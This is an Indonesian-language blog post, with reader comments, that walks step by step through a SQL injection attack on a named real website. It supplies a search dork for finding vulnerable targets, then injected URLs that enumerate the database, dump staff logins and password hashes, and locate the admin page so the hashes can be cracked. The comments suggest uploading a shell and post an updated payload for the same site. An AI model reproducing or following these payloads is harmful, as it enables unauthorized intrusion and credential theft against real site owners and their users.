Tuesday, February 21, 2012

Step By Step Sql Injection (newbie)

Langsung saja mas broo,..
Dork : "inurl:content.php?id=" site:info
Untuk Dork masih banyak yang lain, dan akan ada di postingan berikutnya :D
Untuk target kali ini >> http://www.mirbg.info/content.php?id=23

Tambah string ' (tanda kutip ganda) di akhir Url, jika vuln maka akan ada tulisan seperti ini Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/mirbg/public_html/content.php on line 9

http://www.mirbg.info/content.php?id=23'
Lakukan perintah order by sampai pesan eror muncul lagi
http://www.mirbg.info/content.php?id=23 order by 1-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 2-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 3-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 4-- (Erorr)

Kesimpulannya kita mengambil yang 3 atau table nya berjumlah 3 :D
Selanjutnya lakukan dengan perintah union all select
http://www.mirbg.info/content.php?id=-23 union all select 1,2,3--
Lihat angka berapa yang kita dapat =))
  
Kebetulan muncul angka 2 mas broo,.. ayo lanjutkan !!
Next... kita musti mengetahui versi web tersebut,. dengan perintah version() atau @@version
http://www.mirbg.info/content.php?id=-23 union all select 1,version(),3--

 Keterangan : kita bisa lanjutkan tutorial ini jika target web versi 5.1.56-log, kalu versi 4 main tebak-tebakan =)) kwkwkwkwkw, bagi yang mau boleh aja..
ok next..
Mencari table dengan perintah table_name dan di akhir url tambah from information_schema.tables--

http://www.mirbg.info/content.php?id=-23 union all select 1,table_name,3 from information_schema.tables--

Lanjut,..
dengan perintah group_concat dan di akhir url tambah ini where table_schema=database()--
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--

 Ok, kita mendapatkan banyak table =))
TBL_TEXTS_SEQ,tbl_articles,tbl_content,tbl_form1,tbl_form2,
tbl_languages,tbl_staff,tbl_staff_sessions,tbl_texts,tbl_words

kita buka table yang penting-penting saja (biasanya untuk login)
Sebelum meng inject anda harus menubah table tersebut ke hexa decimal
contoh kita mengambil  tbl_staff dan hexadecimalnya adalah 74626c5f7374616666
Jadi >>
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x74626c5f7374616666--

 Liat apa yang anda dapat =))
isi dari tbl_staff
s_id,s_name,s_login,s_pass,s_admin,s_id,s_name,s_login,s_pass,s_admin

Lihat isi column dengan perintah concat_ws(table_yang_berisi_user_dan_pass)
di akhir url from nama_table_berasal--
http://www.mirbg.info/content.php?id=-23 union all select 1,concat_ws(0x3a,s_login,0x3a,s_pass),3 from tbl_staff
Lihat dan nikmati apa yang kamu dapatkan, :D
Lanjutkan dengan mencari login page
http://www.mirbg.info/admin/index.php
dan untuk password admin, biasanya harus di deckrypt dulu di MD5 Decrypter

Keterangan :
MD5 Decrypter --> http://www.md5decrypter.co.uk/
Converter string to Hexa ---> http://www.string-functions.com/string-hex.aspx

Maaf kalu berantakan :P

Terkait

Description: Step By Step Sql Injection (newbie) Rating: 4.5 Reviewer: Unknown ItemReviewed: Step By Step Sql Injection (newbie)
Al
Mbah Qopet Updated at: 2/21/2012 03:05:00 PM

7 komentar:

  1. Mantap... next.. uploud shell ya lagi.. haha :)

    ReplyDelete
  2. trus klo pengen tau web target versi berapa , gimana gan?
    maklum newbie hehehe

    ReplyDelete
  3. http://www.mirbg.info/content.php?id=23 order by 4-- (Erorr)

    bagian ini errornya kayak gimana om?? gambarnya :D

    ReplyDelete
  4. itu udah lama om, ini yg baru
    http://www.mirbg.info/content.php?id=-23%20union%20all%20select%201,2,3,4,5,6--
    Jadi tablenya ada 6 :P

    ReplyDelete